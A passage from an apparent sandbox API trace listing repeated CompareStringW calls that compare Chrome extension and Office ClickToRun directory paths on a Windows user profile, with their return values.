Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\", cchCount2=130) returned 1 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\", cchCount2=130) returned 3 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\", cchCount2=130) returned 1 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\", cchCount2=130) returned 3 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\", cchCount2=130) returned 3 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\", cchCount2=133) returned 1 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\", cchCount2=133) returned 3 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\", cchCount2=133) returned 1 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\", cchCount2=133) returned 1 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\", cchCount2=133) returned 1 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount2=130) returned 1 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount2=130) returned 3 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount2=130) returned 1 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount2=130) returned 3 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount2=130) returned 3 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\", cchCount2=103) returned 3 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\", cchCount1=132, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\", cchCount2=103) returned 3 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\", cchCount2=103) returned 3 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount1=86, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\", cchCount2=103) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount1=97, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\", cchCount2=103) returned 3 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\", cchCount2=130) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\", cchCount2=130) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\", cchCount2=130) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\", cchCount2=130) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\", cchCount2=130) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount2=130) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount2=130) returned 3 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount2=130) returned 3 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount2=130) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount2=130) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\", cchCount2=130) returned 3 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\", cchCount2=130) returned 3 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\", cchCount2=130) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\", cchCount2=130) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\", cchCount2=130) returned 3 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0283.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\", cchCount2=130) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\", cchCount2=130) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\", cchCount2=130) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\", cchCount2=130) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\", cchCount2=130) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\", cchCount2=130) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\", cchCount2=135) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\", cchCount2=135) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\", cchCount2=135) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\", cchCount2=135) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\", cchCount2=135) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\", cchCount2=134) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 